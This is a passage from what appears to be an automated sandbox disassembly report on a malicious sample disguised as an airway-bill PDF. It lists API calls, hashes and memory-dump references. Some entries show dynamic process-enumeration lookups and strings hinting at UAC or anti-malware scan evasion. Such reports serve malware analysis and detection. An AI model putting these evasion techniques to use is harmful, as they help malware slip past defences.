                                                                                          • Instruction ID: d2828e1d1d3a352d8331beb159307248a1d0db8a93c8b1072f3d4da433c316fd
                                                                                          • Opcode Fuzzy Hash: 30dcea4dc4f714d78a742e8f214277ca7ec8135a58e6d79ccbedbeca11bfa87d
                                                                                          • Instruction Fuzzy Hash: 95314A71A00209ABDB12DEA8C988ABE77ADEF4C324F444561F999D2240D734E951CBA2
                                                                                          APIs
                                                                                          • CLSIDFromProgID.OLE32(00000000,?,00000000,02946D41,?,?,?,00000000), ref: 02946D21
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeFromProgString
                                                                                          • String ID:
                                                                                          • API String ID: 4225568880-0
                                                                                          • Opcode ID: 9ee134be36d89f6ce2a753af500e568cbec6fdd447ecf573efce8ee94b19d021
                                                                                          • Instruction ID: cfdf96230fbf5456810d0d2970f1ef9863cee9df290611045614f1064d1cc0ca
                                                                                          • Opcode Fuzzy Hash: 9ee134be36d89f6ce2a753af500e568cbec6fdd447ecf573efce8ee94b19d021
                                                                                          • Instruction Fuzzy Hash: 6FE06D71604708BBEB12EBA1DC51DAA77EEEFCAB10B524471E801D3650DA74AE009860
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 02935832
                                                                                            • Part of subcall function 02935A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02930000,0295D790), ref: 02935A94
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AB2
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02930000,0295D790), ref: 02935AD0
                                                                                            • Part of subcall function 02935A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02935AEE
                                                                                            • Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02935B37
                                                                                            • Part of subcall function 02935A78: RegQueryValueExA.ADVAPI32(?,02935CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02935B7D,?,80000001), ref: 02935B55
                                                                                            • Part of subcall function 02935A78: RegCloseKey.ADVAPI32(?,02935B84,00000000,?,?,00000000,02935B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02935B77
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                                                          • String ID:
                                                                                          • API String ID: 2796650324-0
                                                                                          • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                          • Instruction ID: e62c89e50368be2d7adc044f3fd8f499c6fd9d175c2a7ea7e898607661c9eff7
                                                                                          • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                          • Instruction Fuzzy Hash: F6E065B1A002148BCB11DEA888C0AA737D8AB0C750F8109A5EC58DF34AD3B0DD208BE0
                                                                                          APIs
                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02937DB0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                          • Instruction ID: bed691df9398c0df3bc2ceea4852be45d52a1f0366026e675ce5f55f2f5de830
                                                                                          • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                          • Instruction Fuzzy Hash: E2D05BB63081107AD220995E6C44EF75BDCCFC9770F100639B668C7180D7208C018671
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                          • Instruction ID: 7dcde3173e757dbbf4b68a2c718f66b61aae7b61d528723070e4c86e6a4a29e7
                                                                                          • Opcode Fuzzy Hash: 39d99aea2b4b3de8ff8324b5e373e5cbc7456bababb3b7d58f404b20ec88a84a
                                                                                          • Instruction Fuzzy Hash: 93C08CE22023000A6A62A1FC0CC408B42CC49842383A41B35B038CA3E2D32188222460
                                                                                          APIs
                                                                                          • GetFileAttributesA.KERNEL32(00000000,?,02952A49,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,Initialize), ref: 02937E47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                          • Instruction ID: 39cd7907b0158be1d275b467cd036abeb579ed540d78553dec0a374b65ddbda1
                                                                                          • Opcode Fuzzy Hash: d4a25932c1186a40cb6d5613e0fc1b23b5cf5f8b84d23e416c631f776c8215f9
                                                                                          • Instruction Fuzzy Hash: FAC08CE12023040E5E62A2FC1CC02DA42CE49847343A02B31E038DA2E2D311D8222410
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID:
                                                                                          • API String ID: 3341692771-0
                                                                                          • Opcode ID: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                          • Instruction ID: 563cb31c968388f225178d87cbc84b6bd5d7961395f58ae05de9ad4380fbf120
                                                                                          • Opcode Fuzzy Hash: ec55763b5f82d1328600eb73f4eb151786d68f8a69a22224f81dbc62eca26ecd
                                                                                          • Instruction Fuzzy Hash: B1C012A260022447EF225A989CC079562CCEB45295B1510A1D408D7250E3A49C004A64
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          • SysReAllocStringLen.OLEAUT32(0295BE78,0294E950,000000B4), ref: 02934C62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocFree
                                                                                          • String ID:
                                                                                          • API String ID: 344208780-0
                                                                                          • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                          • Instruction ID: 6cf23a0179406adc89336559fa3dea393fc99050092ca2eae8ecc7351abc6cca
                                                                                          • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                          • Instruction Fuzzy Hash: DDD080745001015DAF2F9E5549449B7737EADD130634FE65DDC024E250EB25CC00CA31
                                                                                          APIs
                                                                                          • timeSetEvent.WINMM(00002710,00000000,0295BB44,00000000,00000001), ref: 0295BB60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Eventtime
                                                                                          • String ID:
                                                                                          • API String ID: 2982266575-0
                                                                                          • Opcode ID: 2aa8fd0a9e717a264b39c701b3dc6fe7d16956e6d099736a5dc7503318ca7fed
                                                                                          • Instruction ID: c61c735e8e099f4970710fa987ed244c694b85c2d4868ff841ef5aabe923fa4d
                                                                                          • Opcode Fuzzy Hash: 2aa8fd0a9e717a264b39c701b3dc6fe7d16956e6d099736a5dc7503318ca7fed
                                                                                          • Instruction Fuzzy Hash: DBC092F0B807003EF62196A82CD2F2362CEE344B04F600816BE00FE2D5EAE28C601B25
                                                                                          APIs
                                                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02934BEB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString
                                                                                          • String ID:
                                                                                          • API String ID: 2525500382-0
                                                                                          • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                          • Instruction ID: 5757340d3c46417871550e7ea9eba3ff9e2e61659c9a9d1cdb6509046891c1bb
                                                                                          • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                          • Instruction Fuzzy Hash: 28B0123C64820218FB1316610D00BBB00AC5F91387F8620959E38C80D0FF00C4108832
                                                                                          APIs
                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02934C03
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeString
                                                                                          • String ID:
                                                                                          • API String ID: 3341692771-0
                                                                                          • Opcode ID: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                          • Instruction ID: fc6315be2a3ab78e9e9dd5ca11348f9c2f5cc95ccf1093f0a3bdd6006d7c504a
                                                                                          • Opcode Fuzzy Hash: 6fc0f88f0b4d12cbeda0546aa3c9b2a61d9b338520cfab902635a24ef7a42f2a
                                                                                          • Instruction Fuzzy Hash: DCA022AC0003030A8F0B232C000002A203B3FE03003CBC0E800000A0208F3AC000AC30
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02932000), ref: 029316A4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 1391130af4dbc43f26a43d71f4e52d0d921caa2e5c772a8b7849bc469733e24d
                                                                                          • Instruction ID: 5867cfa66a39f610caf152e682e50f8480590ba305d77f4238e304dcb008e5c0
                                                                                          • Opcode Fuzzy Hash: 1391130af4dbc43f26a43d71f4e52d0d921caa2e5c772a8b7849bc469733e24d
                                                                                          • Instruction Fuzzy Hash: F9F09AB2A447956BD7119E9E9C80B92BB98FB40334F054139EA589B340D771A8108BD4
                                                                                          APIs
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 02931704
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1263568516-0
                                                                                          • Opcode ID: 308865c6e9591cdea9abcf2e9558b79d17f489ff8bca0f9ffc28d793ea435442
                                                                                          • Instruction ID: 73ac9c98b43765705d02617469eb717c0fba42ebe527c6483e55b196f5c5a177
                                                                                          • Opcode Fuzzy Hash: 308865c6e9591cdea9abcf2e9558b79d17f489ff8bca0f9ffc28d793ea435442
                                                                                          • Instruction Fuzzy Hash: D8E0CD753003016FD7115B7D5D407137BDCFB84764F184475F54ADB261D660E8108B64
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0294ABE3,?,?,0294AC75,00000000,0294AD51), ref: 0294A970
                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0294A988
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0294A99A
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0294A9AC
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0294A9BE
                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0294A9D0
                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0294A9E2
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0294A9F4
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0294AA06
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0294AA18
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0294AA2A
                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0294AA3C
                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0294AA4E
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0294AA60
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0294AA72
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0294AA84
                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0294AA96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                          • API String ID: 667068680-597814768
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02936BD0,02930000,0295D790), ref: 029358D1
                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029358E8
                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02935918
                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 0293597C
                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359B2
                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359C5
                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359D7
                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000,0295D790), ref: 029359E3
                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0,02930000), ref: 02935A17
                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02936BD0), ref: 02935A23
                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02935A45
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                          • API String ID: 3245196872-1565342463
                                                                                          APIs
                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02935B94
                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02935BA1
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02935BA7
                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02935BD2
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C19
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C29
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02935C51
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02935C61
                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02935C87
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02935C97
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                          • API String ID: 1599918012-2375825460
                                                                                          APIs
                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02937F7D
                                                                                          Similarity
                                                                                          • API ID: DiskFreeSpace
                                                                                          • String ID:
                                                                                          • API String ID: 1705453755-0
                                                                                          APIs
